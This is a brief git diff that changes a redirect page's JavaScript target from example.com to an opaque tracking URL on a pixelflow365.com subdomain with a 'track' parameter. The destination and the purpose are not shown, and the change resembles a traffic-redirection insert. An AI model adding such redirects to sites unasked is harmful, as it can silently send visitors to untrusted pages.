Change redirect URL in index.html

--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
 <title>Redirecting...</title>
 
 <script>
-window.location.href = "https://example.com";
+window.location.href = "https://dcbaggc.pixelflow365.com/c/2f550def9500e?track=GEN_PATRA";
 </script>
 </head>
 <body>
